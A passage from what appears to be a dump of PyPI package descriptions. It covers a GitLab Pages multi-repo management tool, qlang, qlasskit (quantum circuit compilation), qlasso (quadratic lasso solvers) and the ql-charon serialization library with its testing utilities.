'dirty').>>>ssm.repos_dfdomainrepo_namebranchesgit_url0spin.systemsspin-systemsmasterwwwgit@gitlab.com:spin-systems/spin-systems.gitlab.io.git1calqu-calmasterwwwgit@gitlab.com:qu-cal/qu-cal.gitlab.io.git2logspin-logmasterwwwgit@gitlab.com:spin-log/spin-log.gitlab.io.git3confqu-confmasterwwwgit@gitlab.com:qu-conf/qu-conf.gitlab.io.git4porequ-poremasterwwwgit@gitlab.com:qu-pore/qu-pore.gitlab.io.git5ocunaiveoculusmasterwwwgit@gitlab.com:naiveoculus/naiveoculus.gitlab.io.git6arcappendensmasterwwwgit@gitlab.com:appendens/appendens.gitlab.io.git7qrxqu-arxmasterwwwgit@gitlab.com:qu-arx/qu-arx.gitlab.io.git8ergspin-ergmasterwwwgit@gitlab.com:spin-erg/spin-erg.gitlab.io.git9optspin-optmasterwwwgit@gitlab.com:spin-opt/spin-opt.gitlab.io.git10pollqu-pollmasterwwwgit@gitlab.com:qu-poll/qu-poll.gitlab.io.git11arbspin-arbmasterwwwgit@gitlab.com:spin-arb/spin-arb.gitlab.io.git12reedqu-reedmasterwwwgit@gitlab.com:qu-reed/qu-reed.gitlab.io.git13notoqu-notomasterwwwgit@gitlab.com:qu-noto/qu-noto.gitlab.io.git14plotqu-plotmasterwwwgit@gitlab.com:qu-plot/qu-plot.gitlab.io.git15docspin-docmasterwwwgit@gitlab.com:spin-doc/spin-doc.gitlab.io.git16labsqu-labsmasterwwwgit@gitlab.com:qu-labs/qu-labs.gitlab.io.git>>>ssm.check_manifest()domainrepo_namebranchesgit_urlbranchlocalclean0spin.systemsspin-systemsmasterwwwgit@gitlab.com:spin-systems/spin-systems.gitlab.io.gitwwwTrueTrue1calqu-calmasterwwwgit@gitlab.com:qu-cal/qu-cal.gitlab.io.gitwwwTrueTrue2logspin-logmasterwwwgit@gitlab.com:spin-log/spin-log.gitlab.io.gitwwwTrueTrue3confqu-confmasterwwwgit@gitlab.com:qu-conf/qu-conf.gitlab.io.gitwwwTrueTrue4porequ-poremasterwwwgit@gitlab.com:qu-pore/qu-pore.gitlab.io.gitwwwTrueTrue5ocunaiveoculusmasterwwwgit@gitlab.com:naiveoculus/naiveoculus.gitlab.io.gitwwwTrueTrue6arcappendensmasterwwwgit@gitlab.com:appendens/appendens.gitlab.io.gitwwwTrueTrue7qrxqu-arxmasterwwwgit@gitlab.com:qu-arx/qu-arx.gitlab.io.gitwwwTrueTrue8ergspin-ergmasterwwwgit@gitlab.com:spin-erg/spin-erg.gitlab.io.gitwwwTrueTrue9optspin-optmasterwwwgit@gitlab.com:spin-opt/spin-opt.gitlab.io.gitwwwTrueTrue10pollqu-pollmasterwwwgit@gitlab.com:qu-poll/qu-poll.gitlab.io.gitmasterTrueTrue11arbspin-arbmasterwwwgit@gitlab.com:spin-arb/spin-arb.gitlab.io.gitwwwTrueTrue12reedqu-reedmasterwwwgit@gitlab.com:qu-reed/qu-reed.gitlab.io.gitwwwTrueTrue13notoqu-notomasterwwwgit@gitlab.com:qu-noto/qu-noto.gitlab.io.gitwwwTrueTrue14plotqu-plotmasterwwwgit@gitlab.com:qu-plot/qu-plot.gitlab.io.gitwwwTrueTrue15docspin-docmasterwwwgit@gitlab.com:spin-doc/spin-doc.gitlab.io.gitwwwTrueTrue16labsqu-labsmasterwwwgit@gitlab.com:qu-labs/qu-labs.gitlab.io.gitwwwTrueTrueIn this example, thepollrepo is on the master branch, and the rest are on the www (web deploy) branch.Obviously this can then be used to clone the repositories locally\n(or 
address them for any othergit-related task)One nice feature of GitLab (which at the time of writing GitHub doesn't\nprovide to my knowledge) is that these repos can all be private, and only\nthe static site will be hosted publicly (specified in 'Settings' > 'General')To clone a given repo (testing has all been with SSH URLs), there is theql.clone()function,\nand subsequently the namespace can berefreshed to reflect the new addition (this is\ndone automatically within theclonefunction).>>>ql.ns{}>>>ql.clone(ql.ssm.repos_df.git_url[0],\"spin.systems\")Cloninginto'spin.systems'...remote:Enumeratingobjects:6,done.remote:Countingobjects:100%(6/6),done.remote:Compressingobjects:100%(6/6),done.remote:Total236(delta1),reused0(delta0),pack-reused230Receivingobjects:100%(236/236),34.16KiB|210.00KiB/s,done.Resolvingdeltas:100%(123/123),done.>>>ql.ns{'spin.systems':'https://gitlab.com/spin-systems/spin-systems.gitlab.io'}Lastly, the entire manifest of repos can be sourced fromssmandcloned into thens_pathdirectory. This is done on CI to build each site when a change takes place\nin one of the source repos or the quill repo (the 'engine').ql.source_manifest()For now, if the directory named as thedomainentry of the row in thessm.repos_dftable exists, it will simply not touch it. If it doesn't exist, it will try to clone it.Et voila the namespace now contains all the repos (stored in the siblingssdirectory)>>>pprint(ql.ns){'arb':'https://gitlab.com/spin-arb/spin-arb.gitlab.io','arc':'https://gitlab.com/appendens/appendens.gitlab.io','cal':'https://gitlab.com/qu-cal/qu-cal.gitlab.io','conf':'https://gitlab.com/qu-conf/qu-conf.gitlab.io','doc':'https://gitlab.com/spin-doc/spin-doc.gitlab.io','erg':'https://gitlab.com/spin-erg/spin-erg.gitlab.io','labs':'https://gitlab.com/qu-labs/qu-labs.gitlab.io','log':'https://gitlab.com/spin-log/spin-log.gitlab.io','noto':'https://gitlab.com/qu-noto/qu-noto.gitlab.io','ocu':'https://gitlab.com/naiveoculus/naiveoculus.gitlab.io','opt':'https://gitlab.com/spin-opt/spin-opt.gitlab.io','plot':'https://gitlab.com/qu-plot/qu-plot.gitlab.io','poll':'https://gitlab.com/qu-poll/qu-poll.gitlab.io','pore':'https://gitlab.com/qu-pore/qu-pore.gitlab.io','qrx':'https://gitlab.com/qu-arx/qu-arx.gitlab.io','reed':'https://gitlab.com/qu-reed/qu-reed.gitlab.io','spin.systems':'https://gitlab.com/spin-systems/spin-systems.gitlab.io'}At the end ofsource_manifest, thessm.repos_dfDataFrame is updated with a columnlocalindicating whether each domain in the manifest is now in thensnamespace (i.e. whether a\nlocal repo has been created), via thecheck_manifestmethod whichssm'sMMDclass inherits\nfrom theDocclass.Thisupdate_manifestmethod will be expanded to supplement therepos_dfDataFrame with\nother information worth knowing to do with thegitstatus of the repo in question, for those\nwhich are locally available. 
This ensures no unnecessary computation is done before the extra\ninformation is needed.The next thing we can do (having established that these are now cloned locally) is to read the CI YAML\nas the 'layout' for each site, checking they're valid (according to thereferenceon YAML configs for GitLab Pages)>>>manifests=ql.yaml_manifests(as_dicts=False)>>>fork,minmanifests.items():print(k,end=\"\\t\");pprint(m)spin.systemsSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}calSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}logSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}confSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}poreSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}ocuSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}arcSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}qrxSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}ergSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}optSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}pollSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}arbSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}reedSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}notoSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}plotSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}docSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}labsSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}Obviously these could all be made more elaborate for less trivial scripts, this is a first draft showing basic functionality and to enforce/check standardisation across all reposThis setup is deliberately brittle, so any changes will need to be validated in thefold.yaml_utilmodule,\nand so the library itself incorporates testing (simpleassertstatements based on a clear expected implementation)The build directory can be set withchange_build_dir, and using this I set all of the repos to\nbuild from \"site\" (but this can be changed at a later date):fordinql.alias_df.domain:ql.change_build_dir(d,\"site\")\u21e3Moved build path for log from 'site' --> /home/louis/spin/ss/log/site\nCreated build path for ocu at /home/louis/spin/ss/ocu/site\nMoved build path for arc from 'site' --> /home/louis/spin/ss/arc/site\nCreated build path for erg at /home/louis/spin/ss/erg/site\nCreated build path for opt at /home/louis/spin/ss/opt/site\nCreated build path for arb at /home/louis/spin/ss/arb/site\nCreated build path for doc at /home/louis/spin/ss/doc/site\nCreated build path for cal at /home/louis/spin/ss/cal/site\nMoved build path for conf from 'docs' --> /home/louis/spin/ss/conf/site\nCreated build path for pore at /home/louis/spin/ss/pore/site\nCreated build path for qrx at /home/louis/spin/ss/qrx/site\nCreated build path for poll at /home/louis/spin/ss/poll/site\nCreated build path for reed at /home/louis/spin/ss/reed/site\nCreated build path for noto at /home/louis/spin/ss/noto/site\nCreated build path for plot at /home/louis/spin/ss/plot/site\nCreated build path for labs at /home/louis/spin/ss/labs/siteTo commit these changes, I added some more functions to manage thegitrepos.ql.ssm.check_manifest()now has a column referring to whether the working tree\nis clean or has changes to tracked files not staged for commit.The output will be something like this example (where the README inarcwas moved):ql.remote_push_manifest()\u21e3Skipping 'repo_dir=/home/louis/spin/ss/spin.systems' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/cal' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/log' (working tree clean)\nSkipping 
'repo_dir=/home/louis/spin/ss/conf' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/pore' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/ocu' (working tree clean)\nCommit [repo_dir=/home/louis/spin/ss/arc] \u2836 Renamed site/README.md -> README.md\n\u21e2 Pushing \u2836 origin\nSkipping 'repo_dir=/home/louis/spin/ss/qrx' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/erg' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/opt' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/poll' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/arb' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/reed' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/noto' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/plot' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/doc' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/labs' (working tree clean)This function takes arefspecargument which indicates a particular path to add and push in each repo,\naspecific_domainsargument which can be a string of a single domain, or list of multiple,\nand will be evaluated as the list of all domains if left asNone.Runningssm.check_manifest()again is required to updatessm.repos_df.Thisrepos_dfdataframe is also useful for comparing whatever\nother properties you might want to check, e.g. which have a README>>>df=ql.ssm.repos_df>>>df[\"has_README\"]=[\"README.md\"in[x.nameforxin(ql.ns_path/d).iterdir()]fordindf.domain]>>>dfdomainrepo_namebranches...localcleanhas_README0spin.systemsspin-systemsmasterwww...TrueTrueTrue1calqu-calmasterwww...TrueTrueFalse2logspin-logmasterwww...TrueTrueTrue3confqu-confmasterwww...TrueTrueTrue4porequ-poremasterwww...TrueTrueFalse5ocunaiveoculusmasterwww...TrueTrueTrue6arcappendensmasterwww...TrueTrueTrue7qrxqu-arxmasterwww...TrueTrueFalse8ergspin-ergmasterwww...TrueTrueFalse9optspin-optmasterwww...TrueTrueFalse10pollqu-pollmasterwww...TrueTrueFalse11arbspin-arbmasterwww...TrueTrueFalse12reedqu-reedmasterwww...TrueTrueFalse13notoqu-notomasterwww...TrueTrueFalse14plotqu-plotmasterwww...TrueTrueTrue15docspin-docmasterwww...TrueTrueFalse16labsqu-labsmasterwww...TrueTrueFalseObviously this is the kind of thing to then follow up manually,\nbut it helps to have programmatic ways to view the set of directories.If after reviewingssm.repos_dfyou want to push, you can do so\neither with an automated commit message or by passing it as thecommit_msgargument toremote_push_manifest(which will reuse the same commit message\nif multiple repos are not clean).Note you can always manually go in and check thegit diffbeforehandstatic,src, andwireTo build all sites with asrcand/orstaticdirectory, runql.fold.cut.standup().\nThis builds templates from thesrcfolder withstaticjinja, and the static files\nare just copied over (directly undersite/).To build all sites with a wire config, runql.fold.wire.standup().More detailsIn fact,standupreturns a dictionary of the domains, though for now\nonly one domain is in use with wires.emitters=ql.fold.wire.standup(verbose=False)emitters\u21e3{'poll': }Then to push the sites 'live', runql.remote_push_manifest(\"Commit message goes here\").AliasesThe \"canonical names\" displayed in the README are the aliases, which by and large\nare the same as the domain names.These provide the titles of the index pages of each site.I might make more use of these in future, I originally only needed these\nas it turns out the description on GitHub/GitLab isn't stored in the 
git repo\nitself (silly as there's adescriptionbuilt in togit?)Using this let me generate a nice README for the spin.systems superrepo:spin.systemsspin.systems:sscal:q \u2836 callog:\u222b \u2836 logconf:q \u2836 confpore:q \u2836 biorxocu:\u222b \u2836 ocuarc:\u222b \u2836 appqrx:q \u2836 arxerg:\u222b \u2836 ergopt:\u222b \u2836 optpoll:q \u2836 pollarb:\u222b \u2836 arbreed:q \u2836 reednoto:q \u2836 ruinotoplot:q \u2836 plotspotdoc:\u222b \u2836 doclabs:q \u2836 labsAddresses\"Spin addresses\" follow the above \"{namespace}\u2836{domain|alias}\" format, and additionally:Some (initially only\u222b\u2836log) subdomain repos are 'deploy' stage counterparts\nto local 'dev' stage directories.Some (initially only\u222b\u2836log) subdomain repos will be 'addressed' with a date\n[and a zero-based counter for same-day entries]>>>example=\"\u222b\u2836log\u283620\u2836oct\u283625\u28360\">>>eg_addr=ql.AddressPath(example)>>>eg_addr['\u222b','log','20','oct','25','0']The path has been parsed (\"strictly\" by default) into parts which are\n'typed' strings.pprint(list(map(type,eg_addr)))\u21e3[,\n ,\n ,\n ,\n ,\n ]A file path can be obtained from this usinginterpret_filepath,\nwhich is bound to the class as thefilepathproperty:>>>eg_addr.filepathPosixPath('/home/louis/spin/l/20/10oct/25/0_digitalising_spin_addresses.mmd')>>>eg_addr.filepath.exists()True>>>ql.mmd(eg_addr.filepath)ParsedMMDfile(Documentof4blocks)This comes in handy when building components of the spin.systems site such astapwhich can then build parts for a particular domain\nwith>>>eg_addr=ql.AddressPath.from_parts(domain=\"poll\",ymd=(2021,2,17))>>>eg_addr.filepathPosixPath('/home/louis/spin/ss/poll/transmission/21/02feb/17')This gives a simple date-based interface obeying the storage structure of quill,\nthough unlike files, paths to directories in this way may not exist\n(instead they can be created as needed).TODOA next step could be a class representing the state of the websites [beyond CI], which can\nthen be cross-referenced against therepos_df(but the goal is not to entirely Python-ise\nthe site development, just the management of key aspects to do with the version control on disk)Make a pip installable binary wheel (bdist not currently working with SCM, just sdist)Make package capable of downloading missing data files in the event it is being distributed"} +{"package": "qlab", "pacakge-description": "UNKNOWN"} +{"package": "qlang", "pacakge-description": "QNOTICE: This is work in progressA concise, procedural programming language.InstallationTo install Q from pip, use the command:$ pip install qlangIf you want to use Q from a shell script, navigate to the directory where Q is installed and create a symbolic link:ln -s ./cli.py qUsageTo use Q from a shell script:$ q # run interactive shell\n$ q # run fileTo use Q using the Python API:fromqimportrun,run_textrun_text('')# run textrun('')# run fileExample programFactorialF={$0>1?$0*F($0-1):1}"} +{"package": "qlapi", "pacakge-description": "No description available on PyPI."} +{"package": "qlapi-nrsdk", "pacakge-description": "No description available on PyPI."} +{"package": "qlasskit", "pacakge-description": "QlasskitQlasskit is a Python library that allows quantum developers to write classical algorithms in pure Python and translate them into unitary operators (gates) for use in quantum circuits, using boolean expressions as intermediate form.This tool will be useful for any algorithm that relies on a 'blackbox' function and for describing the classical components of a quantum 
algorithm. Qlasskit implements circuit / gate exporters for Qiskit, Cirq, Qasm, Sympy and Pennylane. Qlasskit also supports exporting to Binary Quadratic Models (bqm, ising and qubo) ready to be used in\nquantum annealers, ising machines, simulators, etc.\npip install qlasskit\nFor a quickstart, read the quickstart and examples notebooks from the documentation: https://dakk.github.io/qlasskit.\nfrom qlasskit import qlassf, Qint4\n@qlassf\ndef h(k: Qint4) -> bool:\n    h = True\n    for i in range(4):\n        h = h and k[i]\n    return h\nQlasskit will take care of translating the function to boolean expressions, simplifying them and\ntranslating them to a quantum circuit. Then, we can use Grover to find which h(k) returns True:\nfrom qlasskit.algorithms import Grover\nalgo = Grover(h, True)\nqc = algo.circuit().export(\"circuit\", \"qiskit\")\nAnd that's the result:\nQlasskit also offers type abstraction for encoding inputs and decoding results:\ncounts_readable = algo.decode_counts(counts)\nplot_histogram(counts_readable)\nYou can also use other functions inside a qlassf:\n@qlassf\ndef equal_8(n: Qint4) -> bool:\n    return n == 8\n@qlassfa(defs=[equal_8])\ndef f(n: Qint4) -> bool:\n    n = n + 1 if equal_8(n) else n\n    return n\nQlasskit supports complex data types, like tuples and fixed size lists:\n@qlassf\ndef f(a: Tuple[Qint8, Qint8]) -> Tuple[bool, bool]:\n    return a[0] == 42, a[1] == 0\n@qlassf\ndef search(alist: Qlist[Qint2, 4], to_search: Qint2):\n    for x in alist:\n        if x == to_search:\n            return True\n    return False\nQlasskit functions can be parameterized, and the parameter can be bound before compilation:\n@qlassf\ndef test(a: Parameter[bool], b: bool) -> bool:\n    return a and b\nqf = test.bind(a=True)\nRoadmap\nRead TODO for details about the roadmap and TODOs.\nContributing\nRead CONTRIBUTING for details.\nLicense\nThis software is licensed with Apache License 2.0.\nCite\n@software{qlasskit2023,\n author = {Davide Gessa},\n title = {qlasskit: a python-to-quantum circuit compiler},\n url = {https://github.com/dakk/qlasskit},\n year = {2023},\n}\nAbout the author\nDavide Gessa (dakk)\nhttps://twitter.com/dagide\nhttps://mastodon.social/@dagide\nhttps://dakk.github.io/\nhttps://medium.com/@dakk"} +{"package": "qlasso", "pacakge-description": "qlasso\nThis package provides algorithms and screening rules to solve the quadratic lasso problem\n\\underset{x}{\\min}\\ \\|Ax-c\\|^2 + \\lambda \\|x\\|_1^2\nor, more generally, the quadratic group-lasso\n\\underset{X}{\\min}\\ \\|AX-K\\|^2 + \\lambda \\left( \\sum_{i=1}^p \\|x_i\\|_2 \\right)^2,\nwhere $A\\in\\mathbb{R}^{n\\times p}$, $c\\in\\mathbb{R}^n$, $K\\in\\mathbb{R}^{n\\times r}$ and $x_i\\in\\mathbb{R}^r$ denotes the $i$th row of the matrix $X\\in\\mathbb{R}^{p \\times r}$. It implements the techniques\ndeveloped in a paper recently submitted by G.\u00a0Sagnol and L.\u00a0Pronzato, \"Fast Screening Rules for Optimal Design via Quadratic Lasso Reformulation\", which\nproposes new screening rules and a homotopy algorithm for solving Bayes optimal design problems.\nThis work is a follow-up of the article Sagnol & Pauwels (2019). 
Statistical Papers 60(2):215--234,\nwhere it was shown that the quadratic lasso is equivalent to the problem ofBayes $c$-optimal design:\\min_{w\\geq 0, \\sum_{i=1}^p w_i=1}\\quad c^T \\left( \\sum_{i=1}^p w_i a_i a_i^T + \\lambda I_n \\right)^{-1} cand the quadratic group-lasso is equivalent to the problem ofBayes $L$-optimal design:\\min_{w\\geq 0, \\sum_{i=1}^p w_i=1}\\quad \\operatorname{trace}\\ K^T \\left( \\sum_{i=1}^p w_i a_i a_i^T + \\lambda I_n \\right)^{-1} K,with $a_i\\in\\mathbb{R}^n$ the $i$th column of $A$.InstallationIf you are usingpip, you can simply runpip install qlassoUsageLoad the modulesqlasso_instanceandqlasso_solversimportqlasso.qlasso_instanceasqliimportqlasso.qlasso_solversasqls# load a small random instancerand_instance=qli.SLassoInstance.random_instance(p=50,n=8)# load the mnist instance considered in the papermnist_instance=qli.SLassoInstance.mnist_instance(sample_size=600,resize=1)#inspect size of `A` and `c`print('MNIST. Shape of A:',mnist_instance.A.shape,' -- Shape of c:',mnist_instance.c.shape)print('RAND. Shape of A:',rand_instance.A.shape,' -- Shape of c:',rand_instance.c.shape)Solve the MNIST instance with the CD solver, and D1-screening rule run every 10 iterationsAcceleration should become clearly visible after roughly 50 iterationssolver=qls.CDSolver(mnist_instance,maxit=1000,print_frequency=1,screening_rules=['D1'],screen_frequency=10,apply_screening=True,tol=1e-6)#solve the problem with the value lambda=0.1 for the regularization parametersolver.solve(lbda=0.1)#print optimal solution of the quadratic lassoprint('optimal x-solution:')solver.print_x()#print the corresponding c-optimal designprint()print('optimal design:')solver.print_w()Solve the small random instance with a specific solver and compare the effect of different screening rules:# you can replace ['MWU'] with the solver of your choicealgo={'fista':qls.FistaSolver,# FISTA'CD':qls.CDSolver,# (Block-)Coordinate Descent'FW':qls.FWSolver,# Frank-Wolfe'MWU':qls.MultiplicativeSolver,# Multiplicative Weight Update}['MWU']solver=algo(rand_instance,maxit=1000,print_frequency=1,screening_rules=['B1','B2','B3','D1','D2'],screen_frequency=5,apply_screening=False,#this is required to obtain the true rejection rate of each screening rule#turn this option to True to obtain a CPU speed-uptol=1e-6)solver.solve(lbda=0.1)NB: The ruleB4considered in the paper is also implemented, but it only works for $A$-optimal design problems (i.e., with $r=n$, $K=I$).Now, we can draw a plot to visualize the number of design points eliminated by each rule, as a function of the iteration count:# plot the rejection rate by different screening screening_rulesimportmatplotlib.pyplotaspltforruleinsolver.screening_rejection:plt.plot(solver.screen_iter,solver.screening_rejection[rule],label=rule)plt.legend()plt.show()Solve a quadratic lasso instance using an adaptation of the Homotopy algorithm (LARS)The orginal algorithm for the standard (with non-squared penalty) lasso was described inOsborne, Presnell & Turlach (2000). IMA Journal of Numerical Analysis, 20(3):389--403.andEfron, Hastie, Johnstone & Tibshirani (2004). 
The Annals of Statistics, 32(2):407--499.lars_solver=qls.LarsSolver(mnist_instance)lars_solver.solve(lbda=0.1)#print the c-optimal designprint()print('optimal design:')lars_solver.print_w()Solve a quadratic lasso instance with a SOCP solverYou can replace 'cvxopt' with the name of a commercial solver installed on your system, such asgurobiormoseksocp_solver=qls.PicosSolver(mnist_instance)socp_solver.solve(lbda=0.1,verbosity=1,solver='cvxopt',tol=1e-4)# solves a SOCP reformulation of the Quadratic Lasso problemLicenseqlassois free and open source software and available to you under the terms of the MIT LicenseCitingThe manuscript that describes the methods used in this package will be referenced here upon publication."} +{"package": "qlat", "pacakge-description": "QlatticeA simple lattice QCD library."} +{"package": "qlat-cps", "pacakge-description": "QlatticeA simple lattice QCD library."} +{"package": "qlat-grid", "pacakge-description": "QlatticeA simple lattice QCD library."} +{"package": "qlat-utils", "pacakge-description": "Qlat-UtilsQlattice utilities."} +{"package": "qlazy", "pacakge-description": "No description available on PyPI."} +{"package": "qlc", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "ql-charon", "pacakge-description": "======Charon======Charon makes data serialization and deserialization simple and secure.Charon was inspired by the `Camel project `_,but unlike Camel it does not force a particular serialization format. Charon offers a simple interfacefor defining functions that convert between complex Python objects and primitives that can beserialized into a format of your choice.In other words, this is not a tool that takes an object and serializes it to JSON.It is a tool that takes an object and using a *user-defined serialization function* it converts itto basic Python types which are then serializable to JSON, YAML, msgpack etc.This project also contains (de)serializers for some standard types like ``datetime.datetime``,`set`` and ``frozenset``.Registries can be tested (see `Writing tests`_). This heavily relies on the ``pytest`` module and allows the userto:* test implemented dumpers and loaders while keeping track of implemented versions (see `Version tests`_);* test if all dumpers and loaders have their tests (see `Metatests <#metatests-tests-testing-the-existence-of-loader-dumper-tests>`_);* write tests easily by simply parametrizing a predefined generalized test case (see `Generic tests`_).Usage=====Define dumpers and loaders using decorators with a ``charon.CodecRegistry`` instanceand then group multiple codec registries together using ``charon.Codec``.You can serialize and deserialize objects for which dumpers and loaders were defined by callingthe ``dump`` and ``load`` methods of ``Codec``.Whenever a codec serializes an object, it checks what the serialization function returned and if it finds an objectthat is not a basic Python type, it tries to serialize it again. This kind of recurrent behavior can be time-consuming(and even dangerous for circular references)... note::If there are multiple registries able to serialize the same objectwith same version, the first one found from the *end* of the registries list is picked and used.----------------Creating dumpers----------------Creating a dumper is simple. 
First you have to create a registry in which this dumper will be stored.This is done by:::import charonregistry = charon.CodecRegistry()Then you just have to decorate a function which will receive an instance to serialize.The class of the instance to serialize is given to the decorator as the first argument.The second argument is the *version* which allows versioning of your class and its serialized structure.This approach allows you to restore serialized objects that were created using an older structure(field names may change, variables may come and go etc.).The last parameter ``class_hash`` is optional and is used for version testing (see `Version tests`_).The function that you decorate should accept one argument - the object instance to be serialized.We serialize it into a dictionary containing base values from which we can restore this object... _timedelta_dumper:::@registry.dumper(datetime.timedelta, version = 1, class_hash = 'dadf350239d3779d72d9c933ab52db1b')def _dump_timedelta(obj):return {'days': obj.days, 'seconds': obj.seconds, 'microseconds': obj.microseconds}----------------Creating loaders----------------Creating a loader is also simple. Again you have to have a registry which will store this loader (we use the one definedin the previous section), and again you have to decorate a function which will receive data,but this time these data are those we created using the dumper function.The loader decorator is similar to the dumper one. The first argument is the class which we should deserialize(which we will instantiate from the data received). The second argument, version, is used as mentioned above forversioning of the class implementation. It allows developers to change the structure of their classes and still be ableto restore previously serialized objects into this newer structure.The function which you decorate should accept one parameter: the data previously returned by the serializationfunction (see `_dump_timedelta`).From the received dictionary we recreate an object using its constructor (if applicable) orsetting its internal variables directly (yes, this may be appropriate when deserializing data).::@registry.loader(datetime.timedelta, version = 1, class_hash = 'dadf350239d3779d72d9c933ab52db1b')def _load_timedelta(data):return datetime.timedelta(days = data['days'], seconds = data['seconds'], microseconds = data['microseconds'])-------------------------Using loaders and dumpers-------------------------After we have defined all our classes which will be serialized we can use ``charon.Codec`` to serializeand deserialize objects... code:: python>>> import datetime>>> import charon, charon.extensions>>> codec = charon.Codec([charon.extensions.STANDARD_REGISTRY])>>> delta = datetime.timedelta(seconds = 42)>>> encoded = codec.dump(delta)>>> print(encoded){'!meta': {'dtype': 'timedelta', 'version': 2}, 'params': [0, 42, 0]}>>> loaded = codec.load(encoded)>>> print(delta)0:00:42>>> print(loaded)0:00:42>>> print(delta == loaded)TrueWriting tests=============.. note:: These tests use ``pytest`` module.This section describes options that Charon offers for testing loaders and dumpers.These tests are meant to help with keeping all loaders and dumpers tested andup to date with class structure.There is also a test function that should represent basic test structure for testinga serialization/deserialization pipeline... _pytest.mark.parametrize: https://docs.pytest.org/en/latest/parametrize.html.. 
_pytest_generate_tests: https://docs.pytest.org/en/latest/parametrize.html#pytest-generate-tests.. _generic_tests:-------------Generic tests-------------Charon contains a generic test definition ``test_serialization_pipeline``.This test is a generalized test case consisting of object serialization, deserialization and comparison.The original object and the deserialized object are both tested if they match the class for which the test is used.This is a sanity check to prevent serializating instances of one class and getting instances of another classafter deserialization.The original and the deserialized objects are then compared against each other using the ``vars`` functionif possible, otherwise the standard equality operator (``__eq__``) is used.Usage-----First you have to import the appropriate test function. This is best done in ``conftest.py`` because we will use it later.You also have to define a ``serializer`` fixture to use with this test.::import pytestimport charonfrom charon.testing.generic import test_serialization_pipeline@pytest.fixturedef serializer():return charon.Codec([registry])Then you have to define parameters.You can rename the test function to some convenient name and then use a wrapper to call it.But it is better to parametrize it directly using the pytest marker `pytest.mark.parametrize`_:::pytest.mark.parametrize([(ExampleClass, ExampleClass('Ahoy'))])(test_serialization_pipeline)Another way to parametrize it is by using the `pytest_generate_tests`_ function of pytest.::def pytest_generate_tests(metafunc):'''Generates test cases for simple deserialization and serialization.Test cases are generated by functions with ```generate_``` prefix'''if metafunc.function.__name__ == 'test_serialization_pipeline':metafunc.parametrize('cls, original_obj', [(ExampleClass, ExampleClass('Ahoy'))]).. _Metatests:--------------------------------------------------------------Metatests - Tests testing the existence of loader/dumper tests--------------------------------------------------------------Charon contains tests for testing whenever all dumpers and loaders have tests. This aproach is called metatesting.These tests are convenient when you want to make sure that all of your dumpers and loaders have tests.Usage-----To use this metatest you have to mark your dumper and loader tests with ``pytest.mark``... code:: python@pytest.mark.charon(cls = ExampleClass, dumper_test = True, loader_test = False)def test_example_dumper(self):passAs you can see you use keywords to set up the mark. The ``cls`` keyword specifies the class for which this test works,``dumper_test`` specifies if this is a dumper test and obviously ``loader_test`` specifies whenever this is a loader test.This way you mark all of your tests. Then you just have to import metatests from the ``charon.testing.metatest`` package... code:: pythonfrom charon.testing.metatest import (test_charon_dumper_tests,test_charon_loader_tests,scope_charon_tests)pytest.fixture(scope = 'module')(scope_charon_tests)And that's all: from this point forth all loader and dumper methods would have to be properly tested... note:: This only tests the existence of tests. It does not test the version for which those teste were written. To test the version for which the tests were written see `Version tests`_... 
note:: pytest.fixture(scope = 'module')(scope_charon_tests)\nWe create this fixture in the module scope and not in the session scope because that could create false positive cases.\nExample: You have two registries in different codecs which serialize and deserialize the same class differently. One of these codecs has tests for this class and the other doesn't. If you use a session fixture in this case you will get a false positive check, because the fixture will return tests which are defined for one of the codecs but not for the other. Metatests do not check to which codec (implementation) a test is bound.\n.. _version_tests:\n-------------\nVersion tests\n-------------\nIn large projects it is sometimes difficult to keep track of changes in classes, and to keep their serialization up to date. For example, in a project with multiple people collaborating on it, changes in one class can be made separately by multiple developers, and one of them may forget to update the particular dumpers and loaders and increment their version. To prevent this, Charon has an option to create a hash of the class implementation (hash of the AST) and annotate a dumper / loader with it. Charon also includes tests from ``charon.testing.ast_hash`` called ``test_dumpers_version`` and ``test_loaders_version``.\nUsage\n-----\nTo use this feature first we have to create a hash of the current implementation. This can be done using the ``charon_ast_hash`` script provided by this package. See: ``Generating a hash``. When we have a hash of the class implementation we add a keyword to the standard decorator for loader / dumper.\n.. code:: python\n@registry.dumper(Object, version = 1, class_hash = 'd2498176fad81ad017d1b0875eeeeb1b')\ndef _load_object_v1(_):\n    pass\nThis way we pass the hash of the class implementation to the registry.\n.. note:: The hash is kept only for the latest version of a dumper / loader because we cannot check these versions with older implementations of a particular class.\nThese are all the changes in dumper and loader implementations. Next you have to import the test methods ``charon.testing.ast_hash.test_dumpers_version`` and ``charon.testing.ast_hash.test_loaders_version`` into your test file and pass it an instance of ``charon.Codec``, containing the registries you want to 